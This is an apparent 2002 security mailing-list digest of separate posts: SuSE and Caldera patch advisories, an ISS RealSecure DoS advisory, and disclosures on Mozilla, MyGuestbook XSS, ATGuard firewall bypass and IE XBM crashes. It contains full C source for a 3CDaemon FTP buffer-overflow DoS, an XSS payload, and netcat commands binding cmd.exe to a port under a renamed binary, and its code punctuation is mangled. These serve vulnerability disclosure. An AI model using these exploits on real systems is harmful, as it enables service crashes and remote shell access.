ftp://ftp.suse.com/pub/suse/i386/update/7.0/zq1/sudo-1.6.3p6-90.src.rpm
  c35f6390b360500b7b649e4590a748cc

SuSE-6.4
ftp://ftp.suse.com/pub/suse/i386/update/6.4/ap1/sudo-1.5.9p1-87.i386.rpm
  82d98116eccc73c7a0ce03a51e9b5378
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/6.4/zq1/sudo-1.5.9p1-87.src.rpm
  e75e2608036a963a7339fe4632a2550b

Sparc Platform:

SuSE-7.3
ftp://ftp.suse.com/pub/suse/sparc/update/7.3/ap1/sudo-1.6.3p7-33.sparc.rpm
  bd492b6d601ceb30486e3e970a2211a3
source rpm:
ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/sudo-1.6.3p7-33.src.rpm
  d2435d180cdd76647e1f1416e93c2420

SuSE-7.1
ftp://ftp.suse.com/pub/suse/sparc/update/7.1/ap1/sudo-1.6.3p6-37.sparc.rpm
  bbad36265f93fac25d59f8c26b1ccd52
source rpm:
ftp://ftp.suse.com/pub/suse/sparc/update/7.1/zq1/sudo-1.6.3p6-37.src.rpm
  a328d2eb0fdc816341a68febfeb5a33a

SuSE-7.0
ftp://ftp.suse.com/pub/suse/sparc/update/7.0/ap1/sudo-1.6.3p6-36.sparc.rpm
  48e7b360b45bae0b3e9e90b3bf945f75
source rpm:
ftp://ftp.suse.com/pub/suse/sparc/update/7.0/zq1/sudo-1.6.3p6-36.src.rpm
  bd8f11a8916340e0d243ae1cc647df26

AXP Alpha Platform:

SuSE-7.1
ftp://ftp.suse.com/pub/suse/axp/update/7.1/ap1/sudo-1.6.3p6-40.alpha.rpm
  4505dd58fe309ef0a4515db6a6980ec4
source rpm:
ftp://ftp.suse.com/pub/suse/axp/update/7.1/zq1/sudo-1.6.3p6-40.src.rpm
  85dfbe40da4d93d54d3c16f6489a7f32

ISS Advisory: Remote Denial of Service Vulnerability in RealSecure Network Sensor

[X-Force]

-BEGIN PGP SIGNED MESSAGE-

Internet Security Systems Security Advisory
April 30, 2002

Remote Denial of Service Vulnerability in RealSecure Network Sensor

Synopsis:

ISS X-Force has learned of a denial of service (DoS) vulnerability that
affects Internet Security Systems RealSecure Network Sensor. This
vulnerability may allow remote attackers to crash RealSecure by sending
specially crafted packets to network segments monitored by RealSecure.
RealSecure X-Press Update 4.3 contains a fix for the DHCP vulnerability
and is available for immediate download on the ISS download center.

Affected Versions:

RealSecure Network Sensor 5.x, XPU 3.4 and later
RealSecure Network Sensor 6.0, XPU 3.4 and later
RealSecure Network Sensor 6.5

Description:

RealSecure Network Sensor has three informational signatures associated
with DHCP (Dynamic Host Configuration Protocol): DHCP_ACK (7131),
DHCP_Discover (7132), and DHCP_Request (7133). These signatures contain
a flaw that will result in an illegal attempt to de-reference a null
memory pointer when RealSecure detects certain types of DHCP traffic.
This action may generate an exception error or a segmentation fault
which can cause the RealSecure sensor to crash. This vulnerability was
introduced in RealSecure Network Sensor 6.5. XPU 3.4 delivered the
vulnerable DHCP signatures to older RealSecure product lines including
6.0 and 5.x.

It may be possible for remote attackers to create specially-crafted DHCP
traffic to cause the sensor to malfunction or crash entirely. The three
DHCP signatures were disabled by default in Network Sensor 5.x and 6.0.
The signatures were enabled by default in Network Sensor 6.5 within the
Maximum policy. However, if these signatures are not enabled,
RealSecure Network Sensor is not vulnerable to these attacks.

Recommendations:

X-Force recommends that all RealSecure customers tune their policies to
their environments. RealSecure X-Press Update 4.3 contains a fix for the
DHCP vulnerability. X-Press Update 4.3 is available for download on the
ISS download center:  http://www.iss.net/download/.

DHCP traffic is commonly blocked at perimeter firewalls. Network
administrators are advised to assess their network perimeter defenses
routinely. Exploitation of this vulnerability is blocked by proper
filtering of DHCP traffic on UDP port 67.


__

About Internet Security Systems (ISS)
Founded in 1994, Internet Security Systems (ISS) (Nasdaq: ISSX) is a
pioneer and world leader in software and services that protect critical
online resources from an ever-changing spectrum of threats and misuse.
Internet Security Systems is headquartered in Atlanta, GA, with
additional operations throughout the Americas, Asia, Australia, Europe
and the Middle East.

Copyright (c) 2002 Internet Security Systems, Inc. All rights reserved
worldwide.

Permission is hereby granted for the electronic redistribution of this
document. It is not to be edited or altered in any way without the
express written consent of the Internet Security Systems X-Force. If you
wish to reprint the whole or any part of this document in any other
medium excluding electronic media, please email [EMAIL PROTECTED] for
permission.

Disclaimer: The information within this paper may change without notice.
Use of this information constitutes acceptance for use in an AS IS
condition. There are NO warranties, implied or otherwise, with regard to
this information or its use. Any use of this information is at the
user's risk. In no event shall the author/distributor (Internet Security
Systems X-Force) be held liable for any damages whatsoever arising out
of or in connection with the use or spread of this information.

X-Force PGP Key available on MIT's PGP key server and PGP.com's key
server,
as well as at http://www.iss.net/security_center/sensitive.php

Please send suggestions, updates, and comments to: X-Force

-BEGIN PGP SIGNATURE-
Version: 2.6.2

iQCVAwUBPM7pJjRfJiV99eG9AQHBBAQAmh7q8UVXJcdNbSpuiSA0oyVSgLhqc1O2
bQyGOeNbbWhTLWQ3pMzcBjx4vjTE34dI4T4OT7PLlGVuvcW4fLG70Lq+Fsr34gQj
E17UWKvqvD+AUXvcMq0gxjV15uykkmhy01zZ+Cwn5LsjWXjzpy4r/a7OzZ13Lzrq
u7+bVixmr70=
=m3XN
-END PGP SIGNATURE-

RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)

[Thor Larholm]

 Demonstration:
 ==
 
 A fully dynamic proof-of-concept demonstration
 of this issue is available at
 http://security.greymagic.com/adv/gm001-ns/.

As some of you may have noticed, the above proof-of-concept does not work in
Mozilla 1.0 Release Candidate 1.

Don't get your hopes high about this though, the issue has not been fixed in
moz1rc1 - the XMLHttpRequest was simply broken in this version of the
browser for unknown reasons, a fact not mentioned in the release notes. When
trying to use it, either nothing happens or the browser crashes. The
proof-of-concept works just fine in Mozilla 0.9.9 (and NS6.1+), and would
work fine in moz1rc1 if the XMLHttpRequest object could be used at all.

The Mozilla XML-Extras project also includes a document.load method that is
used to load XML documents. The same issue applies to this method, and a
proof-of-concept demonstration that also works in moz1rc1 can be found at

http://jscript.dk/2002/4/NS6Tests/documentload.html

Regards
Thor Larholm
Jubii A/S - Internet Programmer

Levcgi.coms MyGuestbook JavaScript Injection Vulnerability

[BrainRawt .]

  ___  __  _____
|\  \  |\   \  |\   \|\ \|\  \  |\_\
| \   \__|\  \ | \   \__|\   \ | \   \ \ \ \  \ | |   |\   \   |
\  \___   | \ \   \ \ \   \_| \_|  \ \|___| \   \__|
  \  \   \_|\  \_ \ \   \__|\   \ \ \  _ \  \ \   \
   \  \   \\ \   \ \ \   \ \ \   \ \ \ |\ http://rawt.daemon.sh
\  \___\\ \___\ \ \___\ \ \___\ \ \| \_\  \ \___\
 \ |   | \ |   | \ |   | \ |   | \ |   |\ ||   \ |   |
  \|___|  \|___|  \|___|  \|___|  \|___| \||\|___|


Levcgi.coms MyGuestbook JavaScript Injection Vulnerability
Discovered By BrainRawt ([EMAIL PROTECTED])

About MyGuestbook:
--
Highly customizable guestbook that was released on Feb. 20, 2002, and
can be downloaded at http://www.levcgi.com/programs.cgi?program=myguestbook

According to the website, ...myGuestbook has been downloaded 1298 times!

Vulnerable (tested) Versions:

MyGuestbook v 1.0

Vendor Contact:

4-28-02 - Emailed [EMAIL PROTECTED]

4-30-02 - No Reply from the author and I have decided not to wait since I
   never got a reply about another concern i had several months ago
   involving one of his cgi scripts.

Vulnerability:

myguestbook inproperly filters input to the guestbook making the guestbook
prone to cross-site scripting attacks by malicious visitors to the site. 
This
could be a medium to high concern when mixed with a website that uses 
cookies.

Exploit (POC):

Sign up and post using the name 
scriptalert('evil+java+script+here')/script

or

When posting comments just insert the 
scriptalert('evil+java+script+here')/script
to the comments field.


--
Knowledge is Power! How Powerful are you? - BrainRawt



_
Send and receive Hotmail on your mobile device: http://mobile.msn.com

Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible

[BlueScreen]

As far as i see the article you gave me at tooleaky.zensoft.com mostly deals
with outbound connections.
The ATGuard-Problem still goes futher, it is also a problem with inbound
connections.

I use a Xitami Webserver on Port 50080 for testing purposes.
This Xitami Webserver is (currently) allowed to accept all connections on
all ports (this is also a configuration problem,
but most people just allow inbound connections from any address to any port
for an application).

So, i just did the following:

I:\cd netcat

I:\netcatnc -e c:\winnt\system32\cmd.exe -p 500 -l

I tried to connect to port 500 with telnet: ATGuard fires up as it is
supposed to. So, now i did the following:

I:\netcatcopy nc.exe xiwin32.exe
1 Datei(en) kopiert. (Translation for the curious non-german
readers : 1 File copied :)

I:\netcatxiwin32.exe -e c:\winnt\system32\cmd.exe -p 500 -l

Trying it with telnet again, i got a very nice shell without any notice from
ATGuard.

That's why i mentioned also trojan horses in my Advisories - just renaming
your trojan horse to the name of a program that is allowed
to accept inbound connections will do the trick.

 There is no ultimate way to control all outbound communication. If you use
 your own low-level drivers, no personal firewall can stop you.

Surely there is no ultimate way. But if you are not aware that a problem
exists, you can't think about solutions.
Also, you perhaps will think that your personal firewall is perfectly safe
while it isn't.

Best regards,



---
BlueScreen / Florian Hobelsberger (UIN: 101782087)
Member of:
www.IT-Checkpoint.net
www.Hackeinsteiger.de
www.DvLdW.de

==
To encrypt classified messages, please download and use this PGP-Key:

http://www.florian-hobelsberger.de/BlueScreen-PGP-PubKey.txt
==

Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible

[UMusBKidN]

Hi,

Ye Olde Disclaimer: The information contained in this email is believed to be true. 
However, exhaustive regression testing has not been performed. No guarantees or 
warranties are implicitly or explicitly granted. Use the information within at your 
own risk.

Tested AtGuard version: 3.21.05
Tested OS's: NT4 SP6a, Win95 (don't hit me, I'm cheap)

BlueScreen wrote:
 
 - 
 itcp advisory 13 [EMAIL PROTECTED]
 http://www.it-checkpoint.net/advisory/12.html
 April 29th, 2002
 - 
 
 ITCP Advisory 13: Bypassing of ATGuard Firewall possible
 - -

*snip*

 DETAILS
*snip*
 Sadly ATGuard doesn't save the file paths / doesn't use checksums (would be
 much better), to
 determine wether the executed program is real the one, that is allowed to
 connect to all hosts on port 80.
 It just uses the filename (in this case IEXPLORE.EXE).

Only if you've created your rule in interactive learning mode. See discussion below.

*snip*

 SOLUTION
 
 There doesn't exist an solution, since ATGuard is not developped anymore. We
 were not able to test the Norton Personal Firewall
 for this problem, since no one of us owns it. We are contacting Norton
 directly with this Advisory.

Not quite correct. The bug reported in BlueScreen's advisory does exist. However, 
either the method of testing was incomplete, or the report was incomplete. Also, there 
is a workaround.

AtGuard has the ability to create firewall rules on the fly (in it's interactive 
learning mode). When a connection is attempted and AtGuard cannot find a matching 
rule, in interactive learning mode the user is presented with a window containing 
four options. Two of those options allow the user to specify whether the connection 
should be allowed or blocked, this one time only. The other two of those options allow 
the user to create a rule for particular connections (that may either block or allow 
the connections). This works on either incoming or outgoing connections.

When a rule is created in interactive learning mode, *only the application executable 
name* is stored in the rulebase. This is the bug that BlueScreen pointed out. Without 
a path to the application file in the rulebase, any application with a similar name 
can make use of the firewall rule (block or allow, as the case may be).

However, AtGuard also allows the user to create their own firewall rules manually. 
Click on the dashboard or tray icon, and launch the Settings menu item. Click the 
Add button, create a rule, and make sure you specify an application that the rule 
applies to (on the Application tab, click Application Shown Above, click the Browse 
button, and specify the proper application with the File Dialog box). You will find 
the full path to the file specified in the rule. Shut down your machine, and start it 
up again, and you'll find the full path still there. You can verify the full path in 
the registry under the key:

HKEY_LOCAL_MACHINE\SOFTWARE\WRQ\IAM\FirewallObjects\Applications

Workaround: Manually create firewall rules instead of using interactive learning mode 
to create rules. If you do use interactive learning mode, you should reopen the 
Settings menu, and manually adjust the Application Shown Above so it shows the 
full path to the application that the rule applies to (you apparently don't have to 
trash all your current rules). This *appears* to resolve the issue (from my brief 
testing, YMMV).

Of course, this still wouldn't prevent someone from replacing the specified file with 
malware. However, if you're machine has been compromised to that level, it seems to me 
you've got more to worry about than a few firewall rules :/

It should be noted that AtGuard rules may be created that allow or block access to 
*all* applications. Such rules appear to not be affected by this bug.

 ADDITIONAL INFORMATION
 Vendor has not been contacted. (since he doesn't exist anymore).

Actually, the original vendor does exist: http://www.wrq.com. They simply don't sell 
the product any more. From what I can tell, the original firewall has been 
sufficiently morphed by Symantec so that it no longer has much resemblance to AtGuard. 
Thus, I don't think comparisons between products from these two vendors are fair or 
valid.

-UMus B. KidN

AW: ITCP Advisory 13: Bypassing of ATGuard Firewall possible

[Jonas Koch]

Most products use checksums to detect replaced or modified applications.

But there are other problems with outbound filters. Most personal firewalls
do not detect if a malicious program uses a 'trusted' application to
transmit data (look at tooleaky.zensoft.com). I have tested several products
with a method similar to Bob Sundling's and only BlackICE PC Protection 3.5
stopped communication (Norton PF, Tiny PF and ZoneAlarm did not stop it).

There is no ultimate way to control all outbound communication. If you use
your own low-level drivers, no personal firewall can stop you.

Jonas

Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible

[Jim Hill]

BlueScreen in 014401c1ef8d$1bb66510$0100a8c0@BlueScreenPrimary:

 ATGuard can be fooled to think that a disallowed program is allowed to
 connect to the internet.

This is a well known problem and has been discussed at length on
http://grc.com/lt/scoreboard.htm.

A.M Janssen has written utility which monitors the hashes (SHA1,
Ripe MD-160 or Haval) for the applications in AtGuard's ruleset
http://www.capimonitor.nl/nisfilecheck11.zip. 

It has to be separately scheduled so it's not as good as real
time checks by the firewall but very useful nonetheless.

Security Update: [CSSA-2002-019.0] Linux: imlib processes untrusted images

[security]

To: [EMAIL PROTECTED] [EMAIL PROTECTED] 
[EMAIL PROTECTED]

__

Caldera International, Inc.  Security Advisory

Subject:Linux: imlib processes untrusted images
Advisory number:CSSA-2002-019.0
Issue date: 2002 April 29
Cross reference:
__


1. Problem Description

Imlib versions prior to 1.9.13 would fall back to loading images
via the NetPBM package. NetPBM has various problems itself
that make it unsuitable for loading untrusted images. This
may allow attackers to construct images that, when loaded by
a viewer using Imlib, could cause crashes or potentially, the
execution of arbitrary code.

In addition, this version (1.9.14) also includes some further
fixes from the imlib team.


2. Vulnerable Supported Versions

System  Package
--

OpenLinux 3.1.1 Server  prior to imlib-1.9.14-1.i386.rpm
prior to imlib-devel-1.9.14-1.i386.rpm

OpenLinux 3.1.1 Workstation prior to imlib-1.9.14-1.i386.rpm
prior to imlib-devel-1.9.14-1.i386.rpm

OpenLinux 3.1 Serverprior to imlib-1.9.14-1.i386.rpm
prior to imlib-devel-1.9.14-1.i386.rpm

OpenLinux 3.1 Workstation   prior to imlib-1.9.14-1.i386.rpm
prior to imlib-devel-1.9.14-1.i386.rpm


3. Solution

The proper solution is to install the latest packages.


4. OpenLinux 3.1.1 Server

4.1 Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Server/current/RPMS

4.2 Packages

56ed4f4cdf53abc39ba462021496314bimlib-1.9.14-1.i386.rpm
743951ea75a12121f6696a57a6a4d091imlib-devel-1.9.14-1.i386.rpm

4.3 Installation

rpm -Fvh imlib-1.9.14-1.i386.rpm
rpm -Fvh imlib-devel-1.9.14-1.i386.rpm

4.4 Source Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Server/current/SRPMS

4.5 Source Packages

7f31fe77f6e8086aced4bb412b46e55cimlib-1.9.14-1.src.rpm


5. OpenLinux 3.1.1 Workstation

5.1 Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Workstation/current/RPMS

5.2 Packages

de20299b700ab3918bed0c782abcd6c3imlib-1.9.14-1.i386.rpm
ba96a381bb7c60f20ce74b5645c02fa8imlib-devel-1.9.14-1.i386.rpm

5.3 Installation

rpm -Fvh imlib-1.9.14-1.i386.rpm
rpm -Fvh imlib-devel-1.9.14-1.i386.rpm

5.4 Source Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Workstation/current/SRPMS

5.5 Source Packages

060c0a51023524bb1681ac6b68405bd7imlib-1.9.14-1.src.rpm


6. OpenLinux 3.1 Server

6.1 Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/RPMS

6.2 Packages

72ab762b5b78035581fa9200cac775d7imlib-1.9.14-1.i386.rpm
7e918173391601c5df401be3c7644a78imlib-devel-1.9.14-1.i386.rpm

6.3 Installation

rpm -Fvh imlib-1.9.14-1.i386.rpm
rpm -Fvh imlib-devel-1.9.14-1.i386.rpm

6.4 Source Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/SRPMS

6.5 Source Packages

4c864ed09fd05a3740e3a8d6acab2349imlib-1.9.14-1.src.rpm


7. OpenLinux 3.1 Workstation

7.1 Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/RPMS

7.2 Packages

0e03563711a6c9902b6d7d2016a45c84imlib-1.9.14-1.i386.rpm
d0bbec107ff9b58d8851a0cb680bedf3imlib-devel-1.9.14-1.i386.rpm

7.3 Installation

rpm -Fvh imlib-1.9.14-1.i386.rpm
rpm -Fvh imlib-devel-1.9.14-1.i386.rpm

7.4 Source Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/SRPMS

7.5 Source Packages

5eed6f4ffeeebf13e266a4078bc45442imlib-1.9.14-1.src.rpm


8. References

Specific references for this advisory:
none


Caldera OpenLinux security resources:
http://www.caldera.com/support/security/index.html

Caldera UNIX security resources:
http://stage.caldera.com/support/security/

This security fix closes Caldera incidents sr862212, fz520437,
erg712001.


9. Disclaimer

Caldera International, Inc. is not responsible for the misuse
of any of the information we provide on this website and/or
through our security advisories. Our 

3CDaemon DoS exploit

[skyrim msh]

3Cdaemon 2.0 revision 10 for the Windows platform contains a BOF 
vulnerability at all times, including the login prompt. When 400+ chars are 
sent to the FTP server, it crashes emmediatly. Remote exploit is included. 
For more details see the exploit as well.

greets,
skyrim - [EMAIL PROTECTED]
MaD SKiLL 'H' - http://www.madskill.tk

_
Join the world’s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com


/* MaD SKiLL 'H'
* MsH 4 life! http://www.madskill.tk
* *Private Release*
*
* 3CDaemon 2.0 revision 10 DoS
*
* 11:12 14-4-2002: BOF flaw found by skyrim
*  1:00 15-4-2002: exploit done.
* 23:31 16-4-2002: Edited the exploit slightly, it's a better code now
*
* This program will exploit the buffer overflow vulnerability of
* 3CDaemon 2.0 FTP servers. Sending 400+ chars will make the server crash
* at any time they're send.
*
* Tested on:
* [OS][version]
*  Windows XP (5.1 - 2600) 3CDaemon 2.0 revision 10
*
*  ###
* #  ##
* #### ##
* ##        ##
* ##  ### ### ###   ###
* ##    ###
* ### # ### ###
* ## ##     ### ###
* ## ###  ########
* #   ###    ##  #
*   ###   ### ####
*   # ###  ###
*###  # #  # 
* # # #  
* ### # #
*  ## #  ##  ##   ###
*  ###   ##   ###
*##  
*##  
*   ## ## ###  ########  
*   ###   ###    ##   ###
*   ###   ###    # #  ###
*   ###      #   ## ###
*   ##  #    #
*#        
* ##      ###    ##
*  ## ###   ## ##
*   # ### ###
*  ##   #
*#  ##  ## ##
*     #     ###   ###  ###   ###
*
* I don't know if this will work on versions other then the one I tested it 
on.
* Have fun.
*
* Crew shouts go to: MsH, DFA, uDc
* Personal shouts to: mannie, primus, amok, torment, talented, warsteam, 
frodo, maxxo,
* xo|l, fearless, cybje, kell, frodo, maxxo, and everyone else.
*
* skyrim ([EMAIL PROTECTED])
*/
#include stdio.h
#include sys/types.h
#include sys/socket.h
#include netinet/in.h
#include netdb.h

#define BOFSIZE 420

char banner(void) { printf(MaD SKiLL 'H' 3CDaemon 2.0 revision 10 
DoS\n.:[MsH]:.\n   ---\n); }

void E(char *msg) { perror(msg); exit(1); }

main(int argc, char *argv[])
{
static char ownage[BOFSIZE];
int sockfd, sockfd2, n;

struct sockaddr_in server_addr;
struct hostent *server;

if (argc != 3) {
fprintf(stderr,Usage: %s hostname/ip port\n, argv[0]);
exit(1);
   }
banner();
memset(ownage, 'A', BOFSIZE);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd  0) E(Error occured during opening socket);
server = gethostbyname(argv[1]);
if (server == NULL) E(Error occured during host lookup -No such 
host?-\n);

bzero((char *) server_addr, sizeof(server_addr));
server_addr.sin_family = AF_INET;
bcopy((char *)server-h_addr,
 (char *)server_addr.sin_addr.s_addr,
 server-h_length);
server_addr.sin_port = htons(atoi(argv[2]));
printf(Connecting to target FTP server... );
if (connect(sockfd,server_addr,sizeof(server_addr))  0) { E(Error 
occured during connecting\n); }
printf(Connected, Probing BOF... \n);
n = write(sockfd,ownage,strlen(ownage));
if (n  0) { E(Error occured during writing to socket); }
close(sockfd);
sockfd2=socket(AF_INET, SOCK_STREAM, 0);
printf(Done, checking if server is dead.. \n);
sleep(5);
if (connect(sockfd2,server_addr,sizeof(server_addr))  0) { 
printf(Couldn't establish connection: It seems like it died! =)\n); 
exit(0); }
printf(Server is still alive. Perhaps its not vulnerable?\n);
return 0;
}

RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)

[Rui Miguel Silva Seabra]

Funny,

so much rant about not receiving any contact from Netscape (AOL
subsidiary) or about not even giving prior notification to the
developers about the bug AND, all in all, no one even posts to a 
bugzilla entry on bugzilla.mozilla.org which is the best place for bug
reports on Mozilla (ie, *not marketdroid webpages*).

This is either ignorance of bugzilla (bad but I can understand that), or
intention to difamate the mozilla developers, which is very bad, since a
lot of them dedicate their free time on providing us an extremely
standards compliant, Free Software, cross platform web browser, and so
we actually owe them a favour (so to speak).

If it is ignorance, I will, then, try to educate:
  1. load your favorite browser, and go to http://bugzilla.mozilla.org
  2. submit bug
  3. if very urgent, go to irc.mozilla.org, /join #mozillazine and
SCREAM SECURITY BUG, can anyone urgently look at *URL*FOR*BUG*ID,
please? I can help with details.

In any other case than having first tryed to do that, this rant seems
absolutely unecessary.

Regards

-- 
+ No matter how much you do, you never do enough -- unknown
+ Whatever you do will be insignificant,
| but it is very important that you do it -- Ghandi
+ So let's do it...?



signature.asc
Description: This is a digitally signed message part

IE/OE6.0 cannot handle malformed XBM files

[Adam [wp-ckkl]]

hello,

Internet Explorer [only 6.0] allows the usage of XBM graphic files
and tries to display them whenever they're used in any HTML file
[as IMG tag] or when attached to an e-mail.

XBM structure is very easy
it is a text file with C-like syntax and f.ex. looks like

#define picture_width ?? // picture width
#define picture_height ?? // picture width height
static unsigned char picture_bits[] = { //hex picture data
  );

IE doesn't check properly the content of XBM files
and you may force the browser/e-mail client to hang up
that will end up in their silent exit because of the Access
Violation exception [as shown with a great help of windbg,
it is generated inside mshtml.dll].

IE doesn't check the width and height of the image, so you
may write whatever you want and IE will try to interprete it,
trying to allocate enough memory for an oversized buffer.

When previewed f.ex. in Outlook Express, malformed e-mail
may force this client to exit (and others that rely on IE).

For an example of such malformed e-mail download one from
my homepage and try to open by clicking it in Windows Explorer.
http://www.sztolnia.pl/hack/xbmbug/xbmbug.eml
Don't forget to run OE first :)

Adam Baszczyk
[02-01-11] [en/pl] Home page/Domowa http://www.mykakee.com
[02-01-31] [pl] Pirotechnika http://pyro.pieklo.org
[02-04-27] [pl] Sztolnia kodera, FAQ p.c.p. http://www.sztolnia.pl